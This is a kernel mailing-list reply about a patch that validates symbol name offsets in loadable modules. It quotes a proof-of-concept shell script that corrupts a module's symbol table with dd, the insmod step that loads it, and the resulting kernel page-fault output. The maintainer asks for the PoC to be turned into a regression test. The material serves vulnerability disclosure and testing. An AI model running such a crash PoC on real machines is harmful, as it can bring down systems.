On Sat, Oct 19, 2024 at 04:15:32PM +0200, Tobias Stoeckmann wrote: > It must be verified that the symbol name offsets point into the > string table, not outside of it. > > Signed-off-by: Tobias Stoeckmann <tobias@xxxxxxxxxxxxxx> > --- > Proof of Concept: > > 1. Create "poc.sh" > > ``` > cat > poc.sh << EOF > #!/bin/sh > # Sets an illegal symbol name offset in supplied uncompressed module > # usage: ./poc file.ko > > MODULE="$1" > BASE=$(readelf -S $MODULE | grep '\.symtab' | awk '{ print $5 }') > if [ $(getconf LONG_BIT) = '64' ] > then > OFF=24 > else > OFF=16 > fi > ADDR=$(python -c "print(int(0x$BASE) + $OFF)") > echo -n 'AAAA' | dd bs=1 count=4 of=$MODULE seek=$ADDR conv=notrunc > echo $ADDR > EOF > ``` > > 2. Choose a module which works for your system (adjust if compressed) > > ``` > cp $(find /lib/modules/$(uname -r) |grep ko$ | head -n 1) poc.ko > ``` > > 3. Modify module > > ``` > sh poc.sh poc.ko > ``` > > 4. Try to insert > > ``` > insmod poc.ko > ``` > > In dmesg, you can see lines like: > > ``` > BUG: unable to handle page fault for address: ffff9802022d6f81 > #PF: supervisor read access in kernel mode > #PF: error_code(0x0000) - not-present page > PGD 100000067 P4D 100000067 PUD 0 > --- Thanks! Any chance I can convince you to write you PoC as a new test under lib/tests/module/, see my new patch which adds a new module dedicated test [0] which you can build upon to add a new test there. And then you can make a series with 3 patches for this and your prior one, and you can just refer to the PoC in the fix. [0] https://lkml.kernel.org/r/20241021193310.2014131-1-mcgrof@xxxxxxxxxx Luis